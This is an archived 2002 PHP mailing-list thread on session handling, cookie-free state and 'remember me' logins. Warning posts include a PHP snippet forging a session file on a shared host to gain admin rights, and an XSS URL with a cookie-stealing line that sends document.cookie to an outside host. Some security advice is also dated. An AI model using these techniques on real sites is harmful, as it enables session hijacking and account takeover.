unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Sessions and Cookies
I've just read on MSDN that ASP sessions only work if the client has cookies enabled, Is that true for PHP as well. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Sessions and Cookies
No. http://www.php.net/manual/en/ref.session.php - E R. Z. wrote: I've just read on MSDN that ASP sessions only work if the client has cookies enabled, Is that true for PHP as well. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Sessions and Cookies
Hi, I've just read on MSDN that ASP sessions only work if the client has cookies enabled, Is that true for PHP as well. No, not if you have session.use_trans_sid = 1 in your php.ini. Cheers Jon -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Sessions and Cookies
On Tuesday 08 October 2002 23:34, R. Z. wrote: I've just read on MSDN that ASP sessions only work if the client has cookies enabled, Is that true for PHP as well. Yes. Note that some browsers actually differentiate between session cookies (stored in memory) and 'permanent' cookies (stored on disk). -- Jason Wong - Gremlins Associates - www.gremlins.com.hk Open Source Software Systems Integrators * Web Design Hosting * Internet Intranet Applications Development * /* The algorithm to do that is extremely nasty. You might want to mug someone with it. -- M. Devine, Computer Science 340 */ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Sessions and Cookies
On Tuesday 08 October 2002 23:34, R. Z. wrote: I've just read on MSDN that ASP sessions only work if the client has cookies enabled, Is that true for PHP as well. Yes. Note that some browsers actually differentiate between session cookies (stored in memory) and 'permanent' cookies (stored on disk). You don't _have_ to use cookies. Sessions will attempt to use them by default, but you can configure it to not use cookies at all. If you don't use cookies, though, it's up to you to pass the session ID to each page, though all the links and all the forms. For the session to work, the session ID must get passed everywhere so it knows what session file to load. PHP will attempt to rewrite your URLs and forms for you if you compile it with a certain flag and turn that option on. More and better info in the manual, of course: http://www.php.net/sessions ---John Holmes... -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] sessions without cookies *or* URLs
John, et al -- ...and then John W. Holmes said... % % You can pass the session ID in a form, too. Just use POST, and make it a % hidden element passed to the next page. Yeah, I figured that. % % input type=hidden name=PHPSESSID value=?=$PHPSESSID? % % It's no different than passing it in the URL. I hope you're not thinking Except the URL is cleaner :-) % that it's more secure by doing it this way. Either way the data is % coming from the user and it can't be trusted and it can be modified. Agreed. % % I don't know what this phobia is about passing something in the URL... First, it's just plain cluttered :-) Second, though, it would be nice to not put the user's password right in the URL to then hang out in his browser goto cache, so we have to change *sometthing*, and if we can clean up the URL while we're at it that would be nice. % % ---John Holmes... Thanks HAND :-D -- David T-G * It's easier to fight for one's principles (play) [EMAIL PROTECTED] * than to live up to them. -- fortune cookie (work) [EMAIL PROTECTED] http://www.justpickone.org/davidtg/Shpx gur Pbzzhavpngvbaf Qrprapl Npg! msg81331/pgp0.pgp Description: PGP signature
Re: [PHP] sessions without cookies *or* URLs
Justin, et al -- ...and then Justin French said... % % on 07/10/02 11:32 AM, David T-G ([EMAIL PROTECTED]) wrote: % % It's a start; it confirms some of what I think I understand about % sessions. Now if only I can get the session ID out of the URL without % using any cookies... Any ideas, anyone? % % % I Thought I made it clear, but I'll try again :) Thanks :-) % % You have three options for maintaining state: % % - Cookies % - URL % - POSTed forms OK. I was afraid of that... % % The most common method is plain cookies. But if you want guaranteed state, Sure, but I know that cookies won't work, so that rules them out. % then URL is the answer. My main problem with the URL method is that it % requires the writer(s) to be careful when typing links... ensuring that they Exactly. It's cluttered and you have to be sure to get it right if you're typing it in. % have the session ID in them. Impossible for a CMS. The answer is % enabel_trans_sid. Well, sorta :-) % % More and more hosts are compiling with enable_trans_sid... what this does % is: attempt to pass the SID around in a cookie. If this fails, it will Right. % re-write any relative URLs in your pages to include the session ID... it's So I can code without having to put the ID on the URLs myself? So the transparent-ness is for the programmer? Well, I do like that... % the best of both worlds... transparent cookies if possible, otherwise the % SID is passed around in a URL. Right. % % % So, this rules out a complaint about complicated URLs, because you don't % have to type them. I may not have to type it as a programmer, but the user might have to type it as a surfer. % % % I urge you to look around all the big sites... if they need to maintain % state (a session) they do so with URLs... amazon.com, whatever -- they all % do it. Yeah, I know. % % Why do you not wish to use URLs? Because they're cluttered and it puts the session ID also in the user's goto cache. % % % Justin Thanks HAND :-D -- David T-G * It's easier to fight for one's principles (play) [EMAIL PROTECTED] * than to live up to them. -- fortune cookie (work) [EMAIL PROTECTED] http://www.justpickone.org/davidtg/Shpx gur Pbzzhavpngvbaf Qrprapl Npg! msg81334/pgp0.pgp Description: PGP signature
Re: [PHP] sessions without cookies *or* URLs
on 07/10/02 7:18 PM, David T-G ([EMAIL PROTECTED]) wrote: % re-write any relative URLs in your pages to include the session ID... it's So I can code without having to put the ID on the URLs myself? So the transparent-ness is for the programmer? Well, I do like that... Yes. % So, this rules out a complaint about complicated URLs, because you don't % have to type them. I may not have to type it as a programmer, but the user might have to type it as a surfer. Nope. Why would they type it? The session is managed by PHP's session functions... if 'page.php' has a session_start() call, it will assign a PHPSESSID. Yes, they may acidently bookmark or favourite a session ID, and you'd have to read up / test on the implications of this, but given there are only three options, you have to work through them. If they work for amazon, they can work for you... If you rule out cookies and POST, then guess what you're left with :) Justin -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] sessions without cookies *or* URLs
% The most common method is plain cookies. But if you want guaranteed state, Sure, but I know that cookies won't work, so that rules them out. Won't work, or you don't want to use them? % So, this rules out a complaint about complicated URLs, because you don't % have to type them. I may not have to type it as a programmer, but the user might have to type it as a surfer. Why would the user have to type in a URL with a session id? Your session ids are only good while the user is active and they will expire after a certain amount of time. % Why do you not wish to use URLs? Because they're cluttered and it puts the session ID also in the user's goto cache. Again, why does that matter because that ID is only good while the user is active. When they log out, it's worthless, or after a certain amount of inactive time, it's worthless... ---John Holmes... -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] sessions without cookies *or* URLs
Hi, all -- I've seen a recent flurry of discussion on sessions, and that's good; lovely how that has shown up just as I need to dig into sessions. I think I've come to understand, though, that you can't manage sessions without either URL extensions or cookies, and that's bad (for me, at least). Is that a correct understanding? It seems that using forms to pass the session token would work, but that means having all buttons instead of links, which has its own disadvantages. Is there any other way to get data to the server? We currently use the URL to pass variables but we don't want to hang the page password out there :-) and so we have to maove away from that somehow, and it would be nice if we could get away from URL mangling entirely. Cookies aren't an option, though. TIA HAND :-D -- David T-G * It's easier to fight for one's principles (play) [EMAIL PROTECTED] * than to live up to them. -- fortune cookie (work) [EMAIL PROTECTED] http://www.justpickone.org/davidtg/Shpx gur Pbzzhavpngvbaf Qrprapl Npg! msg81262/pgp0.pgp Description: PGP signature
Re: [PHP] sessions without cookies *or* URLs
I think you're under a little misconception about how sessions are used. Maintaining a session is simply just having a unique identifier for each user, so that the server can recognise the user from page to page, maintaining state. Typically this is done by passing a session id around in he URL or cookies or POSTing forms. A session ID is typically a long unique number -- that's it. What you then do associate or register data TO that Session ID... this data is stored on the SERVER, and NOT passed around in the URL. So you pass around PHPSESSID=198235021612423 in the url or a cookie, and assign data to that session... all of which is stored server side. The session with the id 198235021612423 may have a username, password, shoe size, favourite colour, etc etc all attached to it, done with either: $_SESSION['shoesize'] = 14; // new register globals OFF method or $shoesize = 14; session_register(shoesize); // old method Therefor, I can see no need for anything other than the session ID to be passed around in the URL. Hope this clears it up! Justin French on 06/10/02 9:26 PM, David T-G ([EMAIL PROTECTED]) wrote: Hi, all -- I've seen a recent flurry of discussion on sessions, and that's good; lovely how that has shown up just as I need to dig into sessions. I think I've come to understand, though, that you can't manage sessions without either URL extensions or cookies, and that's bad (for me, at least). Is that a correct understanding? It seems that using forms to pass the session token would work, but that means having all buttons instead of links, which has its own disadvantages. Is there any other way to get data to the server? We currently use the URL to pass variables but we don't want to hang the page password out there :-) and so we have to maove away from that somehow, and it would be nice if we could get away from URL mangling entirely. Cookies aren't an option, though. TIA HAND :-D -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] sessions without cookies *or* URLs
Justin, et al -- ...and then Justin French said... % % I think you're under a little misconception about how sessions are used. Perhaps. I'm new to them :-) % Maintaining a session is simply just having a unique identifier for each % user, so that the server can recognise the user from page to page, % maintaining state. Right. And since it can recognize the user, it can store all sorts of things for him, like the fact that he's been authenticated and what function he did last and so on. Right? % % Typically this is done by passing a session id around in he URL or cookies % or POSTing forms. A session ID is typically a long unique number -- that's % it. Right. But it's the in the URL or cookies that's a problem for me. % % % What you then do associate or register data TO that Session ID... this data % is stored on the SERVER, and NOT passed around in the URL. I understand enough that the data itself isn't in the URL, and that's good (because some of these page comments get long!). % % % So you pass around PHPSESSID=198235021612423 in the url or a cookie, and % assign data to that session... all of which is stored server side. Are those the only ways that I can pass it around? Is there anything else? [Note that I've come to the conclusion that they are and there isn't except perhaps a POST form, but I'd love to be pleasantly surprised.] % % The session with the id 198235021612423 may have a username, password, shoe % size, favourite colour, etc etc all attached to it, done with either: Good deal; that's what I like. % % $_SESSION['shoesize'] = 14; // new register globals OFF method % % or % % $shoesize = 14; % session_register(shoesize); // old method Right. % % % Therefor, I can see no need for anything other than the session ID to be % passed around in the URL. % % Hope this clears it up! It's a start; it confirms some of what I think I understand about sessions. Now if only I can get the session ID out of the URL without using any cookies... Any ideas, anyone? % % % Justin French TIA HAND :-D -- David T-G * It's easier to fight for one's principles (play) [EMAIL PROTECTED] * than to live up to them. -- fortune cookie (work) [EMAIL PROTECTED] http://www.justpickone.org/davidtg/Shpx gur Pbzzhavpngvbaf Qrprapl Npg! msg81311/pgp0.pgp Description: PGP signature
RE: [PHP] sessions without cookies *or* URLs
You can pass the session ID in a form, too. Just use POST, and make it a hidden element passed to the next page. input type=hidden name=PHPSESSID value=?=$PHPSESSID? It's no different than passing it in the URL. I hope you're not thinking that it's more secure by doing it this way. Either way the data is coming from the user and it can't be trusted and it can be modified. I don't know what this phobia is about passing something in the URL... ---John Holmes... -Original Message- From: David T-G [mailto:[EMAIL PROTECTED]] Sent: Sunday, October 06, 2002 9:33 PM To: PHP General list Cc: Justin French Subject: Re: [PHP] sessions without cookies *or* URLs Justin, et al -- ...and then Justin French said... % % I think you're under a little misconception about how sessions are used. Perhaps. I'm new to them :-) % Maintaining a session is simply just having a unique identifier for each % user, so that the server can recognise the user from page to page, % maintaining state. Right. And since it can recognize the user, it can store all sorts of things for him, like the fact that he's been authenticated and what function he did last and so on. Right? % % Typically this is done by passing a session id around in he URL or cookies % or POSTing forms. A session ID is typically a long unique number -- that's % it. Right. But it's the in the URL or cookies that's a problem for me. % % % What you then do associate or register data TO that Session ID... this data % is stored on the SERVER, and NOT passed around in the URL. I understand enough that the data itself isn't in the URL, and that's good (because some of these page comments get long!). % % % So you pass around PHPSESSID=198235021612423 in the url or a cookie, and % assign data to that session... all of which is stored server side. Are those the only ways that I can pass it around? Is there anything else? [Note that I've come to the conclusion that they are and there isn't except perhaps a POST form, but I'd love to be pleasantly surprised.] % % The session with the id 198235021612423 may have a username, password, shoe % size, favourite colour, etc etc all attached to it, done with either: Good deal; that's what I like. % % $_SESSION['shoesize'] = 14; // new register globals OFF method % % or % % $shoesize = 14; % session_register(shoesize); // old method Right. % % % Therefor, I can see no need for anything other than the session ID to be % passed around in the URL. % % Hope this clears it up! It's a start; it confirms some of what I think I understand about sessions. Now if only I can get the session ID out of the URL without using any cookies... Any ideas, anyone? % % % Justin French TIA HAND :-D -- David T-G * It's easier to fight for one's principles (play) [EMAIL PROTECTED] * than to live up to them. -- fortune cookie (work) [EMAIL PROTECTED] http://www.justpickone.org/davidtg/Shpx gur Pbzzhavpngvbaf Qrprapl Npg! -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] sessions without cookies *or* URLs
on 07/10/02 11:32 AM, David T-G ([EMAIL PROTECTED]) wrote: It's a start; it confirms some of what I think I understand about sessions. Now if only I can get the session ID out of the URL without using any cookies... Any ideas, anyone? I Thought I made it clear, but I'll try again :) You have three options for maintaining state: - Cookies - URL - POSTed forms The most common method is plain cookies. But if you want guaranteed state, then URL is the answer. My main problem with the URL method is that it requires the writer(s) to be careful when typing links... ensuring that they have the session ID in them. Impossible for a CMS. The answer is enabel_trans_sid. More and more hosts are compiling with enable_trans_sid... what this does is: attempt to pass the SID around in a cookie. If this fails, it will re-write any relative URLs in your pages to include the session ID... it's the best of both worlds... transparent cookies if possible, otherwise the SID is passed around in a URL. So, this rules out a complaint about complicated URLs, because you don't have to type them. I urge you to look around all the big sites... if they need to maintain state (a session) they do so with URLs... amazon.com, whatever -- they all do it. Why do you not wish to use URLs? Justin -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Sessions without cookies : forms
Hi, thanks for all the replies on my two previous postings relating to sessions and cookies. I have set my mind on using sessions but without cookies, so that entails passing the SID via relative URL's. My problem comes in here, when I create a simple login page with a form that send username and password to the next page, I start_session(); and then in the form action, I append the url with ?=SID? , but that causes two parse errors. Warning: Cannot send session cookie - headers already sent by (output started at /home/www/index.php:3) in /home/www/index.php on line 4 Warning: Cannot send session cache limiter - headers already sent (output started at /home/www/index.php:3) in /home/www/index.php on line 4 The code is like so: html head ?php session_start(); ? /head body form name=form1 method=post action=admin_select_project.php??=SID? table border=0 cellspacing=0 cellpadding=0 tr bgcolor=#CFCFCF td colspan=2Admin Login /td /tr tr tdUsername: /td tdinput type=text name=username /td /tr tr tdPassword: /td tdinput type=text name=password /td /tr tr td input type=submit name=Submit4 value=Submit /td /tr /table /form /body /html What am I missing... Thanks -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Sessions without cookies : forms
You need to start the session before any html. So: ?php session_start(); ? html Cheers! Rick Too much caution is bad for you. By avoiding things you fear, you may let yourself in for unhappy consequences. It is usually wiser to stand up to a scary-seeming experience and walk right into it, risking the bruises as hard knocks. You are likely to find it is not as tough as you had thought. Or you may find it plenty tough, but also discover you have what it takes to handle it. - Norman Vincent Peale From: PHPCoder [EMAIL PROTECTED] Date: Mon, 22 Jul 2002 08:36:44 +0200 To: php-general [EMAIL PROTECTED] Subject: [PHP] Sessions without cookies : forms Hi, thanks for all the replies on my two previous postings relating to sessions and cookies. I have set my mind on using sessions but without cookies, so that entails passing the SID via relative URL's. My problem comes in here, when I create a simple login page with a form that send username and password to the next page, I start_session(); and then in the form action, I append the url with ?=SID? , but that causes two parse errors. Warning: Cannot send session cookie - headers already sent by (output started at /home/www/index.php:3) in /home/www/index.php on line 4 Warning: Cannot send session cache limiter - headers already sent (output started at /home/www/index.php:3) in /home/www/index.php on line 4 The code is like so: html head ?php session_start(); ? /head body form name=form1 method=post action=admin_select_project.php??=SID? table border=0 cellspacing=0 cellpadding=0 tr bgcolor=#CFCFCF td colspan=2Admin Login /td /tr tr tdUsername: /td tdinput type=text name=username /td /tr tr tdPassword: /td tdinput type=text name=password /td /tr tr td input type=submit name=Submit4 value=Submit /td /tr /table /form /body /html What am I missing... Thanks -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Sessions / logins / cookies / security
Sure, why not? Users can't create session variables (unless you're on a virtual server...) ... and I am -- A shared host server that is. Now I'm not sure on this, I haven't tested it. Has anyone? If we're on a virtual server, why can't I just open the session.save_path with PHP and read all of the files. Determine which one is yours and try to determine which variables you are saving. Say you are setting $_SESSION['logged_in'] = 1 and $_SESSION['admin'] = Yes. Then your session file will look like a serialized version of the $_SESSION array. So say I figure out which ones are yours. I use a PHP script to write my own bad_session_file.whatever in the session folder. Then I call up your web page with www.example.com?PHPSESSID=bad_session_file and PHP will load up the session file I just created and make me an admin... Like I said, I haven't tested it though. Safe mode might protect against this, not sure. Anyone have any experience here? ---John Holmes... -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Sessions / logins / cookies / security
on 17/07/02 6:51 PM, John Holmes ([EMAIL PROTECTED]) wrote: ... and I am -- A shared host server that is. Now I'm not sure on this, I haven't tested it. Has anyone? Is this particular vulnerability only in existence when the server is pretty open? I mean, on my particular host, I can't FTP to anything outside my docroot, and I can't use SSH, telnet, etc. phpinfo() says my session.save-path is /tmp -- since (in theory) I can't get the files via telnet, FTP or HTTP, the only option I can think of would be another user on the host gaining access to it via a PHP script... which I'm not sure can be done, and can't really test, because I wouldn't know how to do it. Justin -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Sessions / logins / cookies / security
... and I am -- A shared host server that is. Now I'm not sure on this, I haven't tested it. Has anyone? Is this particular vulnerability only in existence when the server is pretty open? I mean, on my particular host, I can't FTP to anything outside my docroot, and I can't use SSH, telnet, etc. That's for you, but when you run a PHP script, you run it as user Apache, www, nobody, etc...however your system is set up (if PHP is a module). phpinfo() says my session.save-path is /tmp -- since (in theory) I can't get the files via telnet, FTP or HTTP, the only option I can think of would be another user on the host gaining access to it via a PHP script... which I'm not sure can be done, and can't really test, because I wouldn't know how to do it. Yes, the attack could only come from someone on the same server. That's why dedicated servers are preferred and why safe_mode is used on virtual aervers. Safe_mode may protect the sessions, too, not sure. ? $_SESSION['Logged_On'] = 1; $_SESSION['Admin'] = 1; $s = serialize($_SESSION); $fp = fopen(/tmp/bad_session.file,w); fwrite($fp,$s); fclose($fp); ? http://www.yoursite.com?PHPSESSID=bad_session I don't have a virtual server environment to actually test this out with, though...and it would require a lot of work from the hacker...but what else do they have to do. Get a dedicated server...they really aren't that expensive anymore. ---John Holmes... -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Sessions / logins / cookies / security
snip What I'm looking to do is when a user logs in, I start up the session.. I then have the registered session var to verify they are authenticated as they move throughout the site. /snip This solution is no garantuee that the authenticated user is in control during that session. The only thing you realy *know* is that there was a succesful authentication at the beginning of the current session and you would *assume* that the user is at the client screen during the complete session. (the authenticated user could leave the browser unattended). snip Now, when they close the browser and come back, I want them to still be authenticated. /snip The only thing you *know* for sure is that there was a valid authentication during some *previous* session. And that *some* user has still access to that client based on some client specific authentication (pressing ESC during Windows login dialog). So what's your definition of 'authenticated'. snip What's the most secure way, that's not easily spoofed? /snip My point is this. You will never know for sure if the authenticated user is still in control in whatever session (not even the first). If you realy need to be sure, you would use authentication more than once during a session. For example a first time login and then again just before the user wants to post or read important information. If this is of no concern to your application, than it will be no problem to use cookies with some session identifier to allow continuing without authentication during the next session. But it might be wise to force authentication if a user where to enter some kind of admin area of your site during the second session. Success René -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Sessions / logins / cookies / security
I asked something similar a little while ago, but didn't do a good job clarifying. What I'm looking to do is when a user logs in, I start up the session.. I then have the registered session var to verify they are authenticated as they move throughout the site. Now, when they close the browser and come back, I want them to still be authenticated. Obviously, I have to set a cookie. But what do I set? Do I set just their user ID? The MD5 of their password? What's the most secure way, that's not easily spoofed? I don't know that much about cookies, but if I just use a user ID, couldn't someone just change that ID value and 'become' another user? Thanks for any advice, Chad -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Sessions / logins / cookies / security
Anyone? Can someone at least point me to some web article for recommendations? I saw some examples where a password variable was stored, but is that really safe (as long as I MD5 it first?) Chad -Original Message- From: Chad Day [mailto:[EMAIL PROTECTED]] Sent: Tuesday, July 16, 2002 12:30 PM To: [EMAIL PROTECTED] Subject: [PHP] Sessions / logins / cookies / security I asked something similar a little while ago, but didn't do a good job clarifying. What I'm looking to do is when a user logs in, I start up the session.. I then have the registered session var to verify they are authenticated as they move throughout the site. Now, when they close the browser and come back, I want them to still be authenticated. Obviously, I have to set a cookie. But what do I set? Do I set just their user ID? The MD5 of their password? What's the most secure way, that's not easily spoofed? I don't know that much about cookies, but if I just use a user ID, couldn't someone just change that ID value and 'become' another user? Thanks for any advice, Chad -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Sessions / logins / cookies / security
What I'm looking to do is when a user logs in, I start up the session.. I then have the registered session var to verify they are authenticated as they move throughout the site. Now, when they close the browser and come back, I want them to still be authenticated. I don't think this can be a secure authentication. By relying on a cookie for the authentication, the computer is being authenticated, not the user. So anyone using the machine will be seen as authenticated. Anyone who finds the cookie on a particular machine can place it on their own machine, then their machine becomes authenticated. If you need secure, real authentication, proof of the user's identity, the user has to be asked to login each visit, IMO. In theory, only they know their username and password. Am I understanding the goal? Kirk -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Sessions / logins / cookies / security
There really isn't a good way to do this, I think. Any time you're taking just a cookie, and using that data to assume who the user is, it's open to hijacking. I can sniff the cookie or maybe find a cross-site scripting bug to steal it, create the same cookie on my machine, and poof, i'm that user. Now, if it's just for a forum, or something simple, then just do it. It's not worth worrying about someone hijacking my forum user. Anyway, the best way to create the unique id is to use uniqid() in combo with md5(). That'll give you a 32 character string that's hard to predict and isn't based on any of the user data. www.php.net/uniqid ---John Holmes... - Original Message - From: Chad Day [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Tuesday, July 16, 2002 3:30 PM Subject: RE: [PHP] Sessions / logins / cookies / security Anyone? Can someone at least point me to some web article for recommendations? I saw some examples where a password variable was stored, but is that really safe (as long as I MD5 it first?) Chad -Original Message- From: Chad Day [mailto:[EMAIL PROTECTED]] Sent: Tuesday, July 16, 2002 12:30 PM To: [EMAIL PROTECTED] Subject: [PHP] Sessions / logins / cookies / security I asked something similar a little while ago, but didn't do a good job clarifying. What I'm looking to do is when a user logs in, I start up the session.. I then have the registered session var to verify they are authenticated as they move throughout the site. Now, when they close the browser and come back, I want them to still be authenticated. Obviously, I have to set a cookie. But what do I set? Do I set just their user ID? The MD5 of their password? What's the most secure way, that's not easily spoofed? I don't know that much about cookies, but if I just use a user ID, couldn't someone just change that ID value and 'become' another user? Thanks for any advice, Chad -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Sessions / logins / cookies / security
Chad Day wrote: What I'm looking to do is when a user logs in, I start up the session.. I then have the registered session var to verify they are authenticated as they move throughout the site. Now, when they close the browser and come back, I want them to still be authenticated. Obviously, I have to set a cookie. But what do I set? Do I set just their user ID? The MD5 of their password? What's the most secure way, that's not easily spoofed? I don't know that much about cookies, but if I just use a user ID, couldn't someone just change that ID value and 'become' another user? Chad, It sounds like you already have a good idea about the insecurity of the method you mentioned. For the most part, trust your instincts, especially when something seems insecure. :-) You just need to try to come up with a method that is difficult to break. Use your creativity, and for each method you can think of, consider what steps must be taken to break the security of that method. There is always a way, but changing the user ID isn't very difficult to achieve. The cookie is a good idea, but the value of the cookie is what you need to think about. If its value is, as you mentioned, a user ID, someone could try to guess another valid user ID to impersonate another user. Remember that the cookie is data coming from the client that should not be trusted at all. Take the same precautions against client data as you would candy from a stranger; it doesn't mean it's necessarily bad candy, but you need to create some methods to give yourself pretty good assurance that it's not poisoned, etc. You want to inspect it. In your case, you want to create some methods of assuring, to a reasonable extent, that the cookie is coming from the same client as before. With each connection, there are several things you can check, and you can decide whether its more appropriate to store the data you want to check on the client or on the server. For example, if you were to store the IP address in the cookie also, then someone would have to be coming from the same IP address as before (it would seem). Of course, an observant attacker would change the value of this cookie to their own IP to see if that helped them bypass this check, which it would. What if, instead, you stored the IP address on the server in a database associated with the unique ID? Then you can at least be fairly assured that this value cannot be changed. Another option for you might be to encrypt the IP address and keep it in the cookie. This way, if someone else tried to use the same cookie, their IP address would have to appear to be the same (which of course would happen if it's the same computer). Other information you can get from the client includes the browser type, date, etc. The more things you check, and the more difficult you make it for the client to change this data (otherwise your checks aren't very useful), the more difficult you make impersonation. Just make sure to also cater to your legitimate users, which hopefully there will be more of. :-) If your users connect through a large LAN with multiple proxies, their IP address may fluctuate. Dialup users may have fluctuating IPs as well. If you require someone who fails your checks to only provide their password to continue, then the hassle you give your legitimate users is very minimal, and they might appreciate knowing you're looking out for the safety of their data. These are just some ideas. You're ultimately the best person to decide what security model is best for your needs. Like I said, try to be creative and trust your instincts. A good procedure might be to design what you think is a sufficiently strong and useful security model for your needs and ask the list to come up with hypothetical methods that could be used to break it. If the attacks seem very easy to accomplish, you might need to rethink your methods. Anyway, my point is that you want to educate yourself enough that *you* design the security of your site. Trusting others for your security is no better than trusting candy from strangers. :-) Happy hacking. Chris -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Sessions / logins / cookies / security
On my sites, I have a check box next to the login form which says remember me. If they tick this box, and they userid/password is valid, I set a cookie on their system which remembers them, which is just their username and an md5() of their pasword (the same data I add to the session). When maintaining the session, I first check if there is a $_SESSION['uid'] and $_SESSION['pwd'] -- if there is, I validate them (check against the db). If not, I then look for them in my cookie... if they exist, I validate them (check against the db), and assign them to the session. So, if there is no uid and pwd in $_SESSION, I check in $_COOKIE. If there's nothing there, they aren't logged in as far as I can tell. On every page I validate the uid and pwd against the database, so the only way you could fake being another user is to know the uid AND md5()'d pwd. Justin French on 17/07/02 2:30 AM, Chad Day ([EMAIL PROTECTED]) wrote: I asked something similar a little while ago, but didn't do a good job clarifying. What I'm looking to do is when a user logs in, I start up the session.. I then have the registered session var to verify they are authenticated as they move throughout the site. Now, when they close the browser and come back, I want them to still be authenticated. Obviously, I have to set a cookie. But what do I set? Do I set just their user ID? The MD5 of their password? What's the most secure way, that's not easily spoofed? I don't know that much about cookies, but if I just use a user ID, couldn't someone just change that ID value and 'become' another user? Thanks for any advice, Chad -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Sessions / logins / cookies / security
So, if there is no uid and pwd in $_SESSION, I check in $_COOKIE. If there's nothing there, they aren't logged in as far as I can tell. On every page I validate the uid and pwd against the database, so the only way you could fake being another user is to know the uid AND md5()'d pwd. Or steal it. :) I hope you have checked your site for any cross-site scripting vulnerabilities. This is exactly where vulnerabilities like this come into play... ---John Holmes... -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Sessions / logins / cookies / security
On Wed, Jul 17, 2002 at 10:43:24AM +1000, Justin French wrote: I set a cookie on their system which remembers them, which is just their username and an md5() of their pasword (the same data I add to the session). OUCH! Sending the password back out to the net is a scarry prospect. --Dan -- PHP classes that make web design easier SQL Solution | Layout Solution | Form Solution sqlsolution.info | layoutsolution.info | formsolution.info T H E A N A L Y S I S A N D S O L U T I O N S C O M P A N Y 4015 7 Av #4AJ, Brooklyn NY v: 718-854-0335 f: 718-854-0409 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Sessions / logins / cookies / security
on 17/07/02 11:11 AM, Analysis Solutions ([EMAIL PROTECTED]) wrote: On Wed, Jul 17, 2002 at 10:43:24AM +1000, Justin French wrote: I set a cookie on their system which remembers them, which is just their username and an md5() of their pasword (the same data I add to the session). OUCH! Sending the password back out to the net is a scarry prospect. Interesting -- I haven't actually implemented this on a live site, but was about to in the next few days... might hold off :) How else can you verify the user in a remember me situation? Justin -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Sessions / logins / cookies / security
on 17/07/02 11:11 AM, John Holmes ([EMAIL PROTECTED]) wrote: Or steal it. :) I hope you have checked your site for any cross-site scripting vulnerabilities. This is exactly where vulnerabilities like this come into play... Interesting -- I'm only a few days away from launching this... could you elaborate on the potential risk, or point me to some documentation? Thanks heaps, Justin French -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Sessions / logins / cookies / security
Or steal it. :) I hope you have checked your site for any cross-site scripting vulnerabilities. This is exactly where vulnerabilities like this come into play... Interesting -- I'm only a few days away from launching this... could you elaborate on the potential risk, or point me to some documentation? Just search google for Cross Site Scripting and you'll find a ton of articles about that specifically. It all comes down to validating user input and not displaying it directly back to the screen. Here is a link, for example, that'll pop up your cookies for cnn.com. (watch the wrapping!) http://cnn.looksmart.com/r_search?lizchqc=col=cnniqm=0st=1nh=10rf =1venue=allkeyword=qp=search=0key=%3Cscript%3Ealert%28%27Hi%27%29%3 B%3C%2Fscript%3E Now, how about instead of just executing alert(Hi), I do a location.href='www.myserver.com?var='+document.cookie; and send myself your cookie. Then I just simply make my cookie match yours, and poof, I'm you. :) It all comes down to validating user input and never showing it directly back to the browser/screen. Similar problems exist for variables you use in database queries... ---John Holmes... -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Sessions / logins / cookies / security
